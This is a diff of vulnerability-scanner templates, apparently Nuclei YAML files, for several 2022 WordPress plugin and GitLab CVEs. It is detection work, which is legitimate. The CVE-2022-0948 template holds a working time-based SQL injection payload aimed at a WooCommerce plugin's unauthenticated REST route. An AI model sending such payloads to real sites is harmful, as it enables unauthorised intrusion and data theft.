- 'contains(body_2, "ArpPriceTable")'
condition: and
# Enhanced by md on 2022/12/09

1
cves/2022/CVE-2022-0885.yaml
View File

@ -30,6 +30,7 @@ requests:
words:
- "PHP Extension"
- "PHP Version"
- "<!DOCTYPE html"
condition: and
- type: status

45
cves/2022/CVE-2022-0948.yaml Normal file
View File

@ -0,0 +1,45 @@
id: CVE-2022-0948
info:
name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
author: theamanrawat
severity: critical
description: |
The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
reference:
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
- https://wordpress.org/plugins/woc-order-alert/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
- https://plugins.trac.wordpress.org/changeset/2707223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0948
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
requests:
- raw:
- |
@timeout: 15s
POST /?rest_route=/olistener/new HTTP/1.1
Host: {{Hostname}}
content-type: application/json
{"id":" (SLEEP(6))#"}
- |
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code_1 == 200'
- 'contains(content_type_1, "application/json")'
- 'contains(body_2, "olistener-action.olistener-controller")'
condition: and

6
cves/2022/CVE-2022-1007.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-1007
info:
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
- https://wordpress.org/plugins/advanced-booking-calendar/
@ -42,3 +42,5 @@ requests:
- "contains(all_headers_2, 'text/html')"
- "status_code_2 == 200"
condition: and
# Enhanced by md on 2022/12/09

6
cves/2022/CVE-2022-1057.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-1057
info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
@ -33,3 +33,5 @@ requests:
- 'status_code == 500'
- 'contains(body, "been a critical error")'
condition: and
# Enhanced by md on 2022/12/09

43
cves/2022/CVE-2022-1162.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2022-1162
info:
name: GitLab CE/EE - Hardcoded password
author: GitLab Red Team
severity: critical
description: A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
reference:
- https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester
- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1162.json
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1162
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1162
cwe-id: CWE-798
metadata:
shodan-query: http.title:"GitLab"
tags: cve,cve2022,gitlab
requests:
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- "003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa"
- "1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98"
- "6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193"
- "6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef"
- "cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5"
- "f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"
condition: or
extractors:
- type: regex
group: 1
regex:
- '(?:application-)(\S{64})(?:\.css)'

Some files were not shown because too many files have changed in this diff Show More